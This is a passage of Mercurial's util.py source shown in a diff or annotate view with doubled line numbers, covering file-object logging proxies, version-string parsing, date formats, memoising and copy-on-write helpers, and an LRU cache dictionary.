575 return res
576
576
577 def close(self, *args, **kwargs):
577 def close(self, *args, **kwargs):
578 return object.__getattribute__(self, r'_observedcall')(
578 return object.__getattribute__(self, r'_observedcall')(
579 r'close', *args, **kwargs)
579 r'close', *args, **kwargs)
580
580
581 def fileno(self, *args, **kwargs):
581 def fileno(self, *args, **kwargs):
582 return object.__getattribute__(self, r'_observedcall')(
582 return object.__getattribute__(self, r'_observedcall')(
583 r'fileno', *args, **kwargs)
583 r'fileno', *args, **kwargs)
584
584
585 def flush(self, *args, **kwargs):
585 def flush(self, *args, **kwargs):
586 return object.__getattribute__(self, r'_observedcall')(
586 return object.__getattribute__(self, r'_observedcall')(
587 r'flush', *args, **kwargs)
587 r'flush', *args, **kwargs)
588
588
589 def isatty(self, *args, **kwargs):
589 def isatty(self, *args, **kwargs):
590 return object.__getattribute__(self, r'_observedcall')(
590 return object.__getattribute__(self, r'_observedcall')(
591 r'isatty', *args, **kwargs)
591 r'isatty', *args, **kwargs)
592
592
593 def readable(self, *args, **kwargs):
593 def readable(self, *args, **kwargs):
594 return object.__getattribute__(self, r'_observedcall')(
594 return object.__getattribute__(self, r'_observedcall')(
595 r'readable', *args, **kwargs)
595 r'readable', *args, **kwargs)
596
596
597 def readline(self, *args, **kwargs):
597 def readline(self, *args, **kwargs):
598 return object.__getattribute__(self, r'_observedcall')(
598 return object.__getattribute__(self, r'_observedcall')(
599 r'readline', *args, **kwargs)
599 r'readline', *args, **kwargs)
600
600
601 def readlines(self, *args, **kwargs):
601 def readlines(self, *args, **kwargs):
602 return object.__getattribute__(self, r'_observedcall')(
602 return object.__getattribute__(self, r'_observedcall')(
603 r'readlines', *args, **kwargs)
603 r'readlines', *args, **kwargs)
604
604
605 def seek(self, *args, **kwargs):
605 def seek(self, *args, **kwargs):
606 return object.__getattribute__(self, r'_observedcall')(
606 return object.__getattribute__(self, r'_observedcall')(
607 r'seek', *args, **kwargs)
607 r'seek', *args, **kwargs)
608
608
609 def seekable(self, *args, **kwargs):
609 def seekable(self, *args, **kwargs):
610 return object.__getattribute__(self, r'_observedcall')(
610 return object.__getattribute__(self, r'_observedcall')(
611 r'seekable', *args, **kwargs)
611 r'seekable', *args, **kwargs)
612
612
613 def tell(self, *args, **kwargs):
613 def tell(self, *args, **kwargs):
614 return object.__getattribute__(self, r'_observedcall')(
614 return object.__getattribute__(self, r'_observedcall')(
615 r'tell', *args, **kwargs)
615 r'tell', *args, **kwargs)
616
616
617 def truncate(self, *args, **kwargs):
617 def truncate(self, *args, **kwargs):
618 return object.__getattribute__(self, r'_observedcall')(
618 return object.__getattribute__(self, r'_observedcall')(
619 r'truncate', *args, **kwargs)
619 r'truncate', *args, **kwargs)
620
620
621 def writable(self, *args, **kwargs):
621 def writable(self, *args, **kwargs):
622 return object.__getattribute__(self, r'_observedcall')(
622 return object.__getattribute__(self, r'_observedcall')(
623 r'writable', *args, **kwargs)
623 r'writable', *args, **kwargs)
624
624
625 def writelines(self, *args, **kwargs):
625 def writelines(self, *args, **kwargs):
626 return object.__getattribute__(self, r'_observedcall')(
626 return object.__getattribute__(self, r'_observedcall')(
627 r'writelines', *args, **kwargs)
627 r'writelines', *args, **kwargs)
628
628
629 def read(self, *args, **kwargs):
629 def read(self, *args, **kwargs):
630 return object.__getattribute__(self, r'_observedcall')(
630 return object.__getattribute__(self, r'_observedcall')(
631 r'read', *args, **kwargs)
631 r'read', *args, **kwargs)
632
632
633 def readall(self, *args, **kwargs):
633 def readall(self, *args, **kwargs):
634 return object.__getattribute__(self, r'_observedcall')(
634 return object.__getattribute__(self, r'_observedcall')(
635 r'readall', *args, **kwargs)
635 r'readall', *args, **kwargs)
636
636
637 def readinto(self, *args, **kwargs):
637 def readinto(self, *args, **kwargs):
638 return object.__getattribute__(self, r'_observedcall')(
638 return object.__getattribute__(self, r'_observedcall')(
639 r'readinto', *args, **kwargs)
639 r'readinto', *args, **kwargs)
640
640
641 def write(self, *args, **kwargs):
641 def write(self, *args, **kwargs):
642 return object.__getattribute__(self, r'_observedcall')(
642 return object.__getattribute__(self, r'_observedcall')(
643 r'write', *args, **kwargs)
643 r'write', *args, **kwargs)
644
644
645 def detach(self, *args, **kwargs):
645 def detach(self, *args, **kwargs):
646 return object.__getattribute__(self, r'_observedcall')(
646 return object.__getattribute__(self, r'_observedcall')(
647 r'detach', *args, **kwargs)
647 r'detach', *args, **kwargs)
648
648
649 def read1(self, *args, **kwargs):
649 def read1(self, *args, **kwargs):
650 return object.__getattribute__(self, r'_observedcall')(
650 return object.__getattribute__(self, r'_observedcall')(
651 r'read1', *args, **kwargs)
651 r'read1', *args, **kwargs)
652
652
653 class observedbufferedinputpipe(bufferedinputpipe):
653 class observedbufferedinputpipe(bufferedinputpipe):
654 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
655
655
656 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
657 bypass ``fileobjectproxy``. Because of this, we need to make
657 bypass ``fileobjectproxy``. Because of this, we need to make
658 ``bufferedinputpipe`` aware of these operations.
658 ``bufferedinputpipe`` aware of these operations.
659
659
660 This variation of ``bufferedinputpipe`` can notify observers about
660 This variation of ``bufferedinputpipe`` can notify observers about
661 ``os.read()`` events. It also re-publishes other events, such as
661 ``os.read()`` events. It also re-publishes other events, such as
662 ``read()`` and ``readline()``.
662 ``read()`` and ``readline()``.
663 """
663 """
664 def _fillbuffer(self):
664 def _fillbuffer(self):
665 res = super(observedbufferedinputpipe, self)._fillbuffer()
665 res = super(observedbufferedinputpipe, self)._fillbuffer()
666
666
667 fn = getattr(self._input._observer, r'osread', None)
667 fn = getattr(self._input._observer, r'osread', None)
668 if fn:
668 if fn:
669 fn(res, _chunksize)
669 fn(res, _chunksize)
670
670
671 return res
671 return res
672
672
673 # We use different observer methods because the operation isn't
673 # We use different observer methods because the operation isn't
674 # performed on the actual file object but on us.
674 # performed on the actual file object but on us.
675 def read(self, size):
675 def read(self, size):
676 res = super(observedbufferedinputpipe, self).read(size)
676 res = super(observedbufferedinputpipe, self).read(size)
677
677
678 fn = getattr(self._input._observer, r'bufferedread', None)
678 fn = getattr(self._input._observer, r'bufferedread', None)
679 if fn:
679 if fn:
680 fn(res, size)
680 fn(res, size)
681
681
682 return res
682 return res
683
683
684 def readline(self, *args, **kwargs):
684 def readline(self, *args, **kwargs):
685 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
686
686
687 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 fn = getattr(self._input._observer, r'bufferedreadline', None)
688 if fn:
688 if fn:
689 fn(res)
689 fn(res)
690
690
691 return res
691 return res
692
692
693 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
693 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
694 DATA_ESCAPE_MAP.update({
694 DATA_ESCAPE_MAP.update({
695 b'\\': b'\\\\',
695 b'\\': b'\\\\',
696 b'\r': br'\r',
696 b'\r': br'\r',
697 b'\n': br'\n',
697 b'\n': br'\n',
698 })
698 })
699 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
699 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
700
700
701 def escapedata(s):
701 def escapedata(s):
702 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
702 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
703
703
704 class fileobjectobserver(object):
704 class fileobjectobserver(object):
705 """Logs file object activity."""
705 """Logs file object activity."""
706 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
706 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
707 self.fh = fh
707 self.fh = fh
708 self.name = name
708 self.name = name
709 self.logdata = logdata
709 self.logdata = logdata
710 self.reads = reads
710 self.reads = reads
711 self.writes = writes
711 self.writes = writes
712
712
713 def _writedata(self, data):
713 def _writedata(self, data):
714 if not self.logdata:
714 if not self.logdata:
715 self.fh.write('\n')
715 self.fh.write('\n')
716 return
716 return
717
717
718 # Simple case writes all data on a single line.
718 # Simple case writes all data on a single line.
719 if b'\n' not in data:
719 if b'\n' not in data:
720 self.fh.write(': %s\n' % escapedata(data))
720 self.fh.write(': %s\n' % escapedata(data))
721 return
721 return
722
722
723 # Data with newlines is written to multiple lines.
723 # Data with newlines is written to multiple lines.
724 self.fh.write(':\n')
724 self.fh.write(':\n')
725 lines = data.splitlines(True)
725 lines = data.splitlines(True)
726 for line in lines:
726 for line in lines:
727 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
727 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
728
728
729 def read(self, res, size=-1):
729 def read(self, res, size=-1):
730 if not self.reads:
730 if not self.reads:
731 return
731 return
732
732
733 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
733 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
734 self._writedata(res)
734 self._writedata(res)
735
735
736 def readline(self, res, limit=-1):
736 def readline(self, res, limit=-1):
737 if not self.reads:
737 if not self.reads:
738 return
738 return
739
739
740 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
740 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
741 self._writedata(res)
741 self._writedata(res)
742
742
743 def write(self, res, data):
743 def write(self, res, data):
744 if not self.writes:
744 if not self.writes:
745 return
745 return
746
746
747 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
747 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
748 self._writedata(data)
748 self._writedata(data)
749
749
750 def flush(self, res):
750 def flush(self, res):
751 if not self.writes:
751 if not self.writes:
752 return
752 return
753
753
754 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
754 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
755
755
756 # For observedbufferedinputpipe.
756 # For observedbufferedinputpipe.
757 def bufferedread(self, res, size):
757 def bufferedread(self, res, size):
758 self.fh.write('%s> bufferedread(%d) -> %d' % (
758 self.fh.write('%s> bufferedread(%d) -> %d' % (
759 self.name, size, len(res)))
759 self.name, size, len(res)))
760 self._writedata(res)
760 self._writedata(res)
761
761
762 def bufferedreadline(self, res):
762 def bufferedreadline(self, res):
763 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
763 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
764 self._writedata(res)
764 self._writedata(res)
765
765
766 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
766 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
767 logdata=False):
767 logdata=False):
768 """Turn a file object into a logging file object."""
768 """Turn a file object into a logging file object."""
769
769
770 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
770 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
771 logdata=logdata)
771 logdata=logdata)
772 return fileobjectproxy(fh, observer)
772 return fileobjectproxy(fh, observer)
773
773
774 def version():
774 def version():
775 """Return version information if available."""
775 """Return version information if available."""
776 try:
776 try:
777 from . import __version__
777 from . import __version__
778 return __version__.version
778 return __version__.version
779 except ImportError:
779 except ImportError:
780 return 'unknown'
780 return 'unknown'
781
781
782 def versiontuple(v=None, n=4):
782 def versiontuple(v=None, n=4):
783 """Parses a Mercurial version string into an N-tuple.
783 """Parses a Mercurial version string into an N-tuple.
784
784
785 The version string to be parsed is specified with the ``v`` argument.
785 The version string to be parsed is specified with the ``v`` argument.
786 If it isn't defined, the current Mercurial version string will be parsed.
786 If it isn't defined, the current Mercurial version string will be parsed.
787
787
788 ``n`` can be 2, 3, or 4. Here is how some version strings map to
788 ``n`` can be 2, 3, or 4. Here is how some version strings map to
789 returned values:
789 returned values:
790
790
791 >>> v = b'3.6.1+190-df9b73d2d444'
791 >>> v = b'3.6.1+190-df9b73d2d444'
792 >>> versiontuple(v, 2)
792 >>> versiontuple(v, 2)
793 (3, 6)
793 (3, 6)
794 >>> versiontuple(v, 3)
794 >>> versiontuple(v, 3)
795 (3, 6, 1)
795 (3, 6, 1)
796 >>> versiontuple(v, 4)
796 >>> versiontuple(v, 4)
797 (3, 6, 1, '190-df9b73d2d444')
797 (3, 6, 1, '190-df9b73d2d444')
798
798
799 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
799 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
800 (3, 6, 1, '190-df9b73d2d444+20151118')
800 (3, 6, 1, '190-df9b73d2d444+20151118')
801
801
802 >>> v = b'3.6'
802 >>> v = b'3.6'
803 >>> versiontuple(v, 2)
803 >>> versiontuple(v, 2)
804 (3, 6)
804 (3, 6)
805 >>> versiontuple(v, 3)
805 >>> versiontuple(v, 3)
806 (3, 6, None)
806 (3, 6, None)
807 >>> versiontuple(v, 4)
807 >>> versiontuple(v, 4)
808 (3, 6, None, None)
808 (3, 6, None, None)
809
809
810 >>> v = b'3.9-rc'
810 >>> v = b'3.9-rc'
811 >>> versiontuple(v, 2)
811 >>> versiontuple(v, 2)
812 (3, 9)
812 (3, 9)
813 >>> versiontuple(v, 3)
813 >>> versiontuple(v, 3)
814 (3, 9, None)
814 (3, 9, None)
815 >>> versiontuple(v, 4)
815 >>> versiontuple(v, 4)
816 (3, 9, None, 'rc')
816 (3, 9, None, 'rc')
817
817
818 >>> v = b'3.9-rc+2-02a8fea4289b'
818 >>> v = b'3.9-rc+2-02a8fea4289b'
819 >>> versiontuple(v, 2)
819 >>> versiontuple(v, 2)
820 (3, 9)
820 (3, 9)
821 >>> versiontuple(v, 3)
821 >>> versiontuple(v, 3)
822 (3, 9, None)
822 (3, 9, None)
823 >>> versiontuple(v, 4)
823 >>> versiontuple(v, 4)
824 (3, 9, None, 'rc+2-02a8fea4289b')
824 (3, 9, None, 'rc+2-02a8fea4289b')
825 """
825 """
826 if not v:
826 if not v:
827 v = version()
827 v = version()
828 parts = remod.split('[\+-]', v, 1)
828 parts = remod.split('[\+-]', v, 1)
829 if len(parts) == 1:
829 if len(parts) == 1:
830 vparts, extra = parts[0], None
830 vparts, extra = parts[0], None
831 else:
831 else:
832 vparts, extra = parts
832 vparts, extra = parts
833
833
834 vints = []
834 vints = []
835 for i in vparts.split('.'):
835 for i in vparts.split('.'):
836 try:
836 try:
837 vints.append(int(i))
837 vints.append(int(i))
838 except ValueError:
838 except ValueError:
839 break
839 break
840 # (3, 6) -> (3, 6, None)
840 # (3, 6) -> (3, 6, None)
841 while len(vints) < 3:
841 while len(vints) < 3:
842 vints.append(None)
842 vints.append(None)
843
843
844 if n == 2:
844 if n == 2:
845 return (vints[0], vints[1])
845 return (vints[0], vints[1])
846 if n == 3:
846 if n == 3:
847 return (vints[0], vints[1], vints[2])
847 return (vints[0], vints[1], vints[2])
848 if n == 4:
848 if n == 4:
849 return (vints[0], vints[1], vints[2], extra)
849 return (vints[0], vints[1], vints[2], extra)
850
850
851 # used by parsedate
851 # used by parsedate
852 defaultdateformats = (
852 defaultdateformats = (
853 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
853 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
854 '%Y-%m-%dT%H:%M', # without seconds
854 '%Y-%m-%dT%H:%M', # without seconds
855 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
855 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
856 '%Y-%m-%dT%H%M', # without seconds
856 '%Y-%m-%dT%H%M', # without seconds
857 '%Y-%m-%d %H:%M:%S', # our common legal variant
857 '%Y-%m-%d %H:%M:%S', # our common legal variant
858 '%Y-%m-%d %H:%M', # without seconds
858 '%Y-%m-%d %H:%M', # without seconds
859 '%Y-%m-%d %H%M%S', # without :
859 '%Y-%m-%d %H%M%S', # without :
860 '%Y-%m-%d %H%M', # without seconds
860 '%Y-%m-%d %H%M', # without seconds
861 '%Y-%m-%d %I:%M:%S%p',
861 '%Y-%m-%d %I:%M:%S%p',
862 '%Y-%m-%d %H:%M',
862 '%Y-%m-%d %H:%M',
863 '%Y-%m-%d %I:%M%p',
863 '%Y-%m-%d %I:%M%p',
864 '%Y-%m-%d',
864 '%Y-%m-%d',
865 '%m-%d',
865 '%m-%d',
866 '%m/%d',
866 '%m/%d',
867 '%m/%d/%y',
867 '%m/%d/%y',
868 '%m/%d/%Y',
868 '%m/%d/%Y',
869 '%a %b %d %H:%M:%S %Y',
869 '%a %b %d %H:%M:%S %Y',
870 '%a %b %d %I:%M:%S%p %Y',
870 '%a %b %d %I:%M:%S%p %Y',
871 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
871 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
872 '%b %d %H:%M:%S %Y',
872 '%b %d %H:%M:%S %Y',
873 '%b %d %I:%M:%S%p %Y',
873 '%b %d %I:%M:%S%p %Y',
874 '%b %d %H:%M:%S',
874 '%b %d %H:%M:%S',
875 '%b %d %I:%M:%S%p',
875 '%b %d %I:%M:%S%p',
876 '%b %d %H:%M',
876 '%b %d %H:%M',
877 '%b %d %I:%M%p',
877 '%b %d %I:%M%p',
878 '%b %d %Y',
878 '%b %d %Y',
879 '%b %d',
879 '%b %d',
880 '%H:%M:%S',
880 '%H:%M:%S',
881 '%I:%M:%S%p',
881 '%I:%M:%S%p',
882 '%H:%M',
882 '%H:%M',
883 '%I:%M%p',
883 '%I:%M%p',
884 )
884 )
885
885
886 extendeddateformats = defaultdateformats + (
886 extendeddateformats = defaultdateformats + (
887 "%Y",
887 "%Y",
888 "%Y-%m",
888 "%Y-%m",
889 "%b",
889 "%b",
890 "%b %Y",
890 "%b %Y",
891 )
891 )
892
892
893 def cachefunc(func):
893 def cachefunc(func):
894 '''cache the result of function calls'''
894 '''cache the result of function calls'''
895 # XXX doesn't handle keywords args
895 # XXX doesn't handle keywords args
896 if func.__code__.co_argcount == 0:
896 if func.__code__.co_argcount == 0:
897 cache = []
897 cache = []
898 def f():
898 def f():
899 if len(cache) == 0:
899 if len(cache) == 0:
900 cache.append(func())
900 cache.append(func())
901 return cache[0]
901 return cache[0]
902 return f
902 return f
903 cache = {}
903 cache = {}
904 if func.__code__.co_argcount == 1:
904 if func.__code__.co_argcount == 1:
905 # we gain a small amount of time because
905 # we gain a small amount of time because
906 # we don't need to pack/unpack the list
906 # we don't need to pack/unpack the list
907 def f(arg):
907 def f(arg):
908 if arg not in cache:
908 if arg not in cache:
909 cache[arg] = func(arg)
909 cache[arg] = func(arg)
910 return cache[arg]
910 return cache[arg]
911 else:
911 else:
912 def f(*args):
912 def f(*args):
913 if args not in cache:
913 if args not in cache:
914 cache[args] = func(*args)
914 cache[args] = func(*args)
915 return cache[args]
915 return cache[args]
916
916
917 return f
917 return f
918
918
919 class cow(object):
919 class cow(object):
920 """helper class to make copy-on-write easier
920 """helper class to make copy-on-write easier
921
921
922 Call preparewrite before doing any writes.
922 Call preparewrite before doing any writes.
923 """
923 """
924
924
925 def preparewrite(self):
925 def preparewrite(self):
926 """call this before writes, return self or a copied new object"""
926 """call this before writes, return self or a copied new object"""
927 if getattr(self, '_copied', 0):
927 if getattr(self, '_copied', 0):
928 self._copied -= 1
928 self._copied -= 1
929 return self.__class__(self)
929 return self.__class__(self)
930 return self
930 return self
931
931
932 def copy(self):
932 def copy(self):
933 """always do a cheap copy"""
933 """always do a cheap copy"""
934 self._copied = getattr(self, '_copied', 0) + 1
934 self._copied = getattr(self, '_copied', 0) + 1
935 return self
935 return self
936
936
937 class sortdict(collections.OrderedDict):
937 class sortdict(collections.OrderedDict):
938 '''a simple sorted dictionary
938 '''a simple sorted dictionary
939
939
940 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
940 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
941 >>> d2 = d1.copy()
941 >>> d2 = d1.copy()
942 >>> d2
942 >>> d2
943 sortdict([('a', 0), ('b', 1)])
943 sortdict([('a', 0), ('b', 1)])
944 >>> d2.update([(b'a', 2)])
944 >>> d2.update([(b'a', 2)])
945 >>> list(d2.keys()) # should still be in last-set order
945 >>> list(d2.keys()) # should still be in last-set order
946 ['b', 'a']
946 ['b', 'a']
947 '''
947 '''
948
948
949 def __setitem__(self, key, value):
949 def __setitem__(self, key, value):
950 if key in self:
950 if key in self:
951 del self[key]
951 del self[key]
952 super(sortdict, self).__setitem__(key, value)
952 super(sortdict, self).__setitem__(key, value)
953
953
954 if pycompat.ispypy:
954 if pycompat.ispypy:
955 # __setitem__() isn't called as of PyPy 5.8.0
955 # __setitem__() isn't called as of PyPy 5.8.0
956 def update(self, src):
956 def update(self, src):
957 if isinstance(src, dict):
957 if isinstance(src, dict):
958 src = src.iteritems()
958 src = src.iteritems()
959 for k, v in src:
959 for k, v in src:
960 self[k] = v
960 self[k] = v
961
961
962 class cowdict(cow, dict):
962 class cowdict(cow, dict):
963 """copy-on-write dict
963 """copy-on-write dict
964
964
965 Be sure to call d = d.preparewrite() before writing to d.
965 Be sure to call d = d.preparewrite() before writing to d.
966
966
967 >>> a = cowdict()
967 >>> a = cowdict()
968 >>> a is a.preparewrite()
968 >>> a is a.preparewrite()
969 True
969 True
970 >>> b = a.copy()
970 >>> b = a.copy()
971 >>> b is a
971 >>> b is a
972 True
972 True
973 >>> c = b.copy()
973 >>> c = b.copy()
974 >>> c is a
974 >>> c is a
975 True
975 True
976 >>> a = a.preparewrite()
976 >>> a = a.preparewrite()
977 >>> b is a
977 >>> b is a
978 False
978 False
979 >>> a is a.preparewrite()
979 >>> a is a.preparewrite()
980 True
980 True
981 >>> c = c.preparewrite()
981 >>> c = c.preparewrite()
982 >>> b is c
982 >>> b is c
983 False
983 False
984 >>> b is b.preparewrite()
984 >>> b is b.preparewrite()
985 True
985 True
986 """
986 """
987
987
988 class cowsortdict(cow, sortdict):
988 class cowsortdict(cow, sortdict):
989 """copy-on-write sortdict
989 """copy-on-write sortdict
990
990
991 Be sure to call d = d.preparewrite() before writing to d.
991 Be sure to call d = d.preparewrite() before writing to d.
992 """
992 """
993
993
994 class transactional(object):
994 class transactional(object):
995 """Base class for making a transactional type into a context manager."""
995 """Base class for making a transactional type into a context manager."""
996 __metaclass__ = abc.ABCMeta
996 __metaclass__ = abc.ABCMeta
997
997
998 @abc.abstractmethod
998 @abc.abstractmethod
999 def close(self):
999 def close(self):
1000 """Successfully closes the transaction."""
1000 """Successfully closes the transaction."""
1001
1001
1002 @abc.abstractmethod
1002 @abc.abstractmethod
1003 def release(self):
1003 def release(self):
1004 """Marks the end of the transaction.
1004 """Marks the end of the transaction.
1005
1005
1006 If the transaction has not been closed, it will be aborted.
1006 If the transaction has not been closed, it will be aborted.
1007 """
1007 """
1008
1008
1009 def __enter__(self):
1009 def __enter__(self):
1010 return self
1010 return self
1011
1011
1012 def __exit__(self, exc_type, exc_val, exc_tb):
1012 def __exit__(self, exc_type, exc_val, exc_tb):
1013 try:
1013 try:
1014 if exc_type is None:
1014 if exc_type is None:
1015 self.close()
1015 self.close()
1016 finally:
1016 finally:
1017 self.release()
1017 self.release()
1018
1018
1019 @contextlib.contextmanager
1019 @contextlib.contextmanager
1020 def acceptintervention(tr=None):
1020 def acceptintervention(tr=None):
1021 """A context manager that closes the transaction on InterventionRequired
1021 """A context manager that closes the transaction on InterventionRequired
1022
1022
1023 If no transaction was provided, this simply runs the body and returns
1023 If no transaction was provided, this simply runs the body and returns
1024 """
1024 """
1025 if not tr:
1025 if not tr:
1026 yield
1026 yield
1027 return
1027 return
1028 try:
1028 try:
1029 yield
1029 yield
1030 tr.close()
1030 tr.close()
1031 except error.InterventionRequired:
1031 except error.InterventionRequired:
1032 tr.close()
1032 tr.close()
1033 raise
1033 raise
1034 finally:
1034 finally:
1035 tr.release()
1035 tr.release()
1036
1036
1037 @contextlib.contextmanager
1037 @contextlib.contextmanager
1038 def nullcontextmanager():
1038 def nullcontextmanager():
1039 yield
1039 yield
1040
1040
1041 class _lrucachenode(object):
1041 class _lrucachenode(object):
1042 """A node in a doubly linked list.
1042 """A node in a doubly linked list.
1043
1043
1044 Holds a reference to nodes on either side as well as a key-value
1044 Holds a reference to nodes on either side as well as a key-value
1045 pair for the dictionary entry.
1045 pair for the dictionary entry.
1046 """
1046 """
1047 __slots__ = (u'next', u'prev', u'key', u'value')
1047 __slots__ = (u'next', u'prev', u'key', u'value')
1048
1048
1049 def __init__(self):
1049 def __init__(self):
1050 self.next = None
1050 self.next = None
1051 self.prev = None
1051 self.prev = None
1052
1052
1053 self.key = _notset
1053 self.key = _notset
1054 self.value = None
1054 self.value = None
1055
1055
1056 def markempty(self):
1056 def markempty(self):
1057 """Mark the node as emptied."""
1057 """Mark the node as emptied."""
1058 self.key = _notset
1058 self.key = _notset
1059
1059
1060 class lrucachedict(object):
1060 class lrucachedict(object):
1061 """Dict that caches most recent accesses and sets.
1061 """Dict that caches most recent accesses and sets.
1062
1062
1063 The dict consists of an actual backing dict - indexed by original
1063 The dict consists of an actual backing dict - indexed by original
1064 key - and a doubly linked circular list defining the order of entries in
1064 key - and a doubly linked circular list defining the order of entries in
1065 the cache.
1065 the cache.
1066
1066
1067 The head node is the newest entry in the cache. If the cache is full,
1067 The head node is the newest entry in the cache. If the cache is full,
1068 we recycle head.prev and make it the new head. Cache accesses result in
1068 we recycle head.prev and make it the new head. Cache accesses result in
1069 the node being moved to before the existing head and being marked as the
1069 the node being moved to before the existing head and being marked as the
1070 new head node.
1070 new head node.
1071 """
1071 """
1072 def __init__(self, max):
1072 def __init__(self, max):
1073 self._cache = {}
1073 self._cache = {}
1074
1074
1075 self._head = head = _lrucachenode()
1075 self._head = head = _lrucachenode()
1076 head.prev = head
1076 head.prev = head
1077 head.next = head
1077 head.next = head
1078 self._size = 1
1078 self._size = 1
1079 self._capacity = max
1079 self._capacity = max
1080
1080
1081 def __len__(self):
1081 def __len__(self):
1082 return len(self._cache)
1082 return len(self._cache)
1083
1083
1084 def __contains__(self, k):
1084 def __contains__(self, k):
1085 return k in self._cache
1085 return k in self._cache
1086
1086
1087 def __iter__(self):
1087 def __iter__(self):
1088 # We don't have to iterate in cache order, but why not.
1088 # We don't have to iterate in cache order, but why not.
1089 n = self._head
1089 n = self._head
1090 for i in range(len(self._cache)):
1090 for i in range(len(self._cache)):
1091 yield n.key
1091 yield n.key
1092 n = n.next
1092 n = n.next
1093
1093
1094 def __getitem__(self, k):
1094 def __getitem__(self, k):
1095 node = self._cache[k]
1095 node = self._cache[k]
1096 self._movetohead(node)
1096 self._movetohead(node)
1097 return node.value
1097 return node.value
1098
1098
1099 def __setitem__(self, k, v):
1099 def __setitem__(self, k, v):
1100 node = self._cache.get(k)
1100 node = self._cache.get(k)
1101 # Replace existing value and mark as newest.
1101 # Replace existing value and mark as newest.
1102 if node is not None:
1102 if node is not None:
1103 node.value = v
1103 node.value = v
1104 self._movetohead(node)
1104 self._movetohead(node)
1105 return
1105 return
1106
1106
1107 if self._size < self._capacity:
1107 if self._size < self._capacity:
1108 node = self._addcapacity()
1108 node = self._addcapacity()
1109 else:
1109 else:
1110 # Grab the last/oldest item.
1110 # Grab the last/oldest item.
1111 node = self._head.prev
1111 node = self._head.prev
1112
1112
1113 # At capacity. Kill the old entry.
1113 # At capacity. Kill the old entry.
1114 if node.key is not _notset:
1114 if node.key is not _notset:
1115 del self._cache[node.key]
1115 del self._cache[node.key]
1116
1116
1117 node.key = k
1117 node.key = k
1118 node.value = v
1118 node.value = v
1119 self._cache[k] = node
1119 self._cache[k] = node
1120 # And mark it as newest entry. No need to adjust order since it
1120 # And mark it as newest entry. No need to adjust order since it
1121 # is already self._head.prev.
1121 # is already self._head.prev.
1122 self._head = node
1122 self._head = node
1123
1123
1124 def __delitem__(self, k):
1124 def __delitem__(self, k):
1125 node = self._cache.pop(k)
1125 node = self._cache.pop(k)
1126 node.markempty()
1126 node.markempty()
1127
1127
1128 # Temporarily mark as newest item before re-adjusting head to make
1128 # Temporarily mark as newest item before re-adjusting head to make
1129 # this node the oldest item.
1129 # this node the oldest item.
1130 self._movetohead(node)
1130 self._movetohead(node)
1131 self._head = node.next
1131 self._head = node.next
1132
1132
1133 # Additional dict methods.
1133 # Additional dict methods.
1134
1134
1135 def get(self, k, default=None):
1135 def get(self, k, default=None):
1136 try:
1136 try:
1137 return self._cache[k].value
1137 return self._cache[k].value
1138 except KeyError:
1138 except KeyError:
1139 return default
1139 return default
1140
1140
1141 def clear(self):
1141 def clear(self):
1142 n = self._head
1142 n = self._head
1143 while n.key is not _notset:
1143 while n.key is not _notset:
1144 n.markempty()
1144 n.markempty()
1145 n = n.next
1145 n = n.next
1146
1146
1147 self._cache.clear()
1147 self._cache.clear()
1148
1148
1149 def copy(self):
1149 def copy(self):
1150 result = lrucachedict(self._capacity)
1150 result = lrucachedict(self._capacity)
1151 n = self._head.prev
1151 n = self._head.prev
1152 # Iterate in oldest-to-newest order, so the copy has the right ordering
1152 # Iterate in oldest-to-newest order, so the copy has the right ordering
1153 for i in range(len(self._cache)):
1153 for i in range(len(self._cache)):
1154 result[n.key] = n.value
1154 result[n.key] = n.value
1155 n = n.prev
1155 n = n.prev
1156 return result
1156 return result
1157
1157
1158 def _movetohead(self, node):
1158 def _movetohead(self, node):
1159 """Mark a node as the newest, making it the new head.
1159 """Mark a node as the newest, making it the new head.
1160
1160
1161 When a node is accessed, it becomes the freshest entry in the LRU
1161 When a node is accessed, it becomes the freshest entry in the LRU
1162 list, which is denoted by self._head.
1162 list, which is denoted by self._head.
1163
1163
